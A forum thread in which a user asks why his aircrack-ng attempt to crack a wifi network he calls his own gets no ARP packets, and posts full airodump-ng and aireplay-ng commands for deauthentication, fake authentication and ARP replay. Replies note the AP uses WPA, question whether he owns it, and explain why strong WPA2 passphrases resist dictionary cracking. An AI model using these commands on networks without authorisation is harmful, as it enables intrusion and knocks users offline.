Thread: Wheres the problem ? (wifi)

Just burned his ISO

Default Wheres the problem ? (wifi)

Hi guys...i try to crack my own wlan about 2months and i have always the same problem cannot capture ARP....i dont know why i tried every command...
    Now i decide to stop searching anymore this doesnt make any sense anymore and ask You for help...i will post here everything what i did....
    (be4 i started to cracking i typed:
    wlanconfig ath0 destroy
    wlanconfig ath0 create wlandev wifi0 wlanmode monitor)
    Now from the top ...

First console (from top):

airodump-ng -c 6 --bssid 00:1A:2A:7B:50:16 -w lulacz ath0

Second :

aireplay-ng -0 0 -a 00:1A:2A:7B:50:16 -c 00:04:0E:FF:4B:A0 -h 06:19:E0:84:8B:3D ath0

Third (but that was after 10min):

aireplay-ng -1 0 -e lol -a 00:1A:2A:7B:50:16 -h 06:19:E0:84:8B:3D ath0

Last one :

aireplay-ng -3 -b 00:1A:2A:7B:50:16 -h 06:19:E0:84:8B:3D ath0

i299.photobucket.com/albums/mm298/meso-buthus/snapshot1.png

(sorry cannot post pic)

As u can see i was there 14min but i leave my notebook and gained more than 30min and 50000 #Data packets, but still without ARP...

And here is my question why ?

(my card is on Atheros chipset)

The reason is that the AP uses WPA and not WEP encryption. If this really is your own AP, which I am inclined to think it is not since you did not notice this, simply change the encryption to WEP and retry the process.
    -Monkeys are like nature's humans.

Wheres the problem ? (wifi)
    Seems like a classic case of PEBKAC.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Just burned his ISO

i changed it and it works...

thx dude... but is it possible to crack PSK without dictionary....
    coz that what i saw there are keys like SP-19287691, NC-12312555 something like that and dictionary dont have passwords like this....so is there other way to crack wpa2 ?

Quote Originally Posted by mesobuthus View Post
    i changed it and it works...

thx dude... but is it possible to crack PSK without dictionary....
    coz that what i saw there are keys like SP-19287691, NC-12312555 something like that and dictionary dont have passwords like this....so is there other way to crack wpa2 ?
    Short answer, no. And sure there are dictionaries that do include words like these as well, however it is really not much point in filling a dictionary with random number sequences of this length as the wordlist will grow in size fast and it still is unlikely that you will ever find the password. This is the reason that users are encouraged to use long, preferably 63 characters, random passphrases utilizing all allowed characters.
    -Monkeys are like nature's humans.

Just burned his ISO

yeah....filling dictionary....i know my dictionary needs already more than 14MB....i try to fill with words, names everything lol...but when someone will have something like SP-620001693 like i have in wpa2....that is like impossible to crack....there could be everything...so the only way to crack WLAN is cracking WEP....